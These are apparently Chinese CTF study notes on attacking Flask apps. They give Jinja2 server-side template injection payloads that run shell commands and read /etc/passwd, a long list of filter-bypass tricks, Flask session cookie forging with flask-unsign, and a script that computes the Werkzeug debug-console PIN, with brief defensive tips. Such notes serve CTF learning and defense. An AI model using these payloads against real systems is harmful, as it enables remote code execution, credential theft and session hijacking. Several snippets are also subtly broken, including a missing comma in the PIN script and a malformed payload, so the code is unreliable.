Python 漏洞初阶
SSTI
flask框架中的ssti
Python 正则表达式 | 菜鸟教程 Python 面向对象 | 菜鸟教程
SSTI(Server-Side Template Injection) 服务端模板注入 ,服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分渲染,可能导致敏感信息泄露、代码执行、GetShell 等。
如何避免:
1. 不要使用f-string拼接模板,render_template_string,如
render_template_string(f"Hello {name}")
安全的写法:render_template('index.html',name=name)
2. 只把用户输入当变量传,而不是模板代码;如果必须动态渲染,一定要严格过滤{{}} {% %} {# #}等
利用方式:
获取到基类 object,重点关注 os/file 这些关键字。如{{("".__class__.__base__.__subclasses__())}}查看所有子类,再用脚本寻找可以利用的类:
import re
data=r'''[<class 'type'>, <class 'async_generator'>]'''
useful_class=['linecache', 'os._wrap_close', 'subprocess.Popen',
'warnings.catch_warnings', '_frozen_importlib._ModuleLock',
'_frozen_importlib._DummyModuleLock', '_frozen_importlib._ModuleLockManager',
'_frozen_importlib.ModuleSpec']
pattern=re.compile(r"'(.*?)'")
class_list=pattern.findall(data)
for i in class_list:
for j in useful_class:
if j in i:
print(str(class_list.index(i))+":"+i)但是有的题目不会显示subclasses,这是需要我们直接输入小脚本,观察页面回显,如
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__'].open('/etc/passwd').read()}}
{%endif%}
{%endfor%} 获取到有用的类的下标后,我们可以进行:
命令执行
{{().__class__.__bases__[0].__subclasses__()[160].__init__.__globals__['popen']('ls').read()}}可以先看这个类里面有什么__globals__.keys(),这里直接__globals__['popen']是因为发现__globals__下面没有os模块,如果有,可以__globals__['os'].popen('ls').read()
{{().__class__.__bases__[0].__subclasses__()[160].__init__.__globals__.__builtins__['eval']('__import__('os').popen('ls /').read()')}}
有些ctf题ls发现没有与flag相关的文件夹,flag可能在环境变量env里,即__globals__['popen']('env').read()
文件读取
{{().__class__.__bases__[0].__subclasses__()[160].__init__.__globals__.__builtins__['open']('1.txt').read()}}发现无法打开.py文件?
绕过
关键字(空格,点号)过滤
# +号拼接绕过,也用于点过滤
{{ ""['__cl'+'ass__']['__ba'+'se__']['__subcl'+'asses__']() }}# 使用Jinjia2的~号拼接
{% set a='__cl' %}{% set b='ass__' %}{% set c='__ba' %}{% set d='se__' %}{{()[a~b][c~d] }}注意拼接时()要放在引号外面,subclasses 是方法,不是属性。方法必须加 () 调用,不能直接当键名查
# 使用过滤器reverse绕过
{% set a='__ssalc__'|reverse %}{{ ()[a] }}
# 不带空格简洁
{{''['__ssalc__'[::-1]]}}# 使用 join 过滤器绕过,同时可以绕过引号过滤
{% set a=dict(__cl=a,ass__=a)|join %}{{ ()[a] }}符号过滤
# {{和}}被过滤使用{%和%}绕过
{% print(''.__class__) %}{% %}定义变量、循环、判断等逻辑操作,不输出
# 中括号过滤,魔术方法__getitem__可代替中括号
.__subclasses__().__getitem__(13).__getitem__('popen')# 过滤点[]
{{()|attr('__class__')|attr('__base__')}}# 下划线被过滤,可以使用过滤器输入下划线,如使用函数attr()
{{()|attr(request.form.p1)|attr(request.form.p2)}}
# 同时post传参p1=__class__&p2=__base__
#也可以将下划线16进制编码
{{()['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']}}# 单双引号被过滤可get/post传参
#get传参 ?p1=popen&p2=cat /flag
{{.__globals__[request.args.p1](request.args.p2).read()}}# 数字被过滤,a=5*5+1=26
{% set a='aaaaa'|length*'aaaaa'|length+'a'|length %}{{().__class_.__base__.__subclasses__()[a]}}获取特殊字符
{% set a=(lipsum|string|list) %}{{a[18]}}![[Pasted image 20260405175857.png]]
工具
鸡肋?焚靖(fenjing)是一个针对CTF比赛中Jinja SSTI绕过WAF的全自动脚本,但咋没用?
flask session
Python Flask Session漏洞 flask session 存储在客户端cookie中,且仅对session进行了签名。 cookie结构
.base64(payload).base64(timestamp).base64(hmac-signature)流程示例
- 找到cookie中的session值,用flask-unsign解密,得到类似于
{'is_admin': False}的形式
flask-unsign --decode --cookie 'eyJpc19hZG1pbiI6ZmFsc2V9'- 找secret_key,方法很多,看题目
- debug=True
- 在源码/配置文件里找 app.py config.py .env .git,可结合任意文件读取
- 结合ssti
{{config.SECRET_KEY}} - 字典爆破
flask-unsign --unsign --cookie 'eyJpc19hZG1pbiI6ZmFsc2V9' --wordlist rockyou.txt- 构造管理员session
flask-unsign --sign --secret "weak_key" --cookie "{'is_admin': True}"防御
用强随机密钥
把secret_key写在环境变量或配置文件中
生产环境关闭debug
app.config.update(
SECRET_KEY = os.urandom(24), # 必须强随机
SESSION_COOKIE_HTTPONLY = True,
SESSION_COOKIE_SECURE = True, # 强制HTTPS
SESSION_COOKIE_SAMESITE = 'Strict',
)flask-debug模式的安全隐患
开发环境中设置app.run(debug=True)时,它提供了自动重载、详细的错误页面和交互式调试器等便利功能。
在debug的环境下输入PIN码调用python的交互式shell
但需要6个参数呃呃呃
1. username: 运行该Flask程序的用户名 /etc/passwd文件内
2. modname: 模块名 flask.app
3. getattr(): app名,值为Flask
4. getattr(): Flask目录下的一个app.py的绝对路径,这个值可以在报错页面看到。但有个需注意,Python3是 app.py,Python2中是app.pyc。 报错页面回显(访问报错界面 输入不能识别的参数) str(uuid.getnode()):
5. MAC地址,读取这两个文件地址:/sys/class/net/eth0/address或者/sys/class/net/ens33/address
6. get_machine_id(): 系统id /etc/machine-id 或者docker环境id /proc/self/cgroup因为需要读取文件目录,就要找执行文件读取函数的模块子类,所以会搭配ssti注入,如获取mac地址
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/sys/class/net/eth0/address').read()}}import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb' # 1.username
'flask.app', # 2.modname
'Flask', # 3.appname
'/usr/local/lib/python3.7/site-packages/flask/app.py' # 4.moddir
]
private_bits = [
'130771165565282', # 5.str(uuid.getnode())
'1408f836b0ca514d796cbf8960e45fa1' # 6.machine-id
]
# py<=3.7 是 md5 ,3.8 以后是 sha1
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)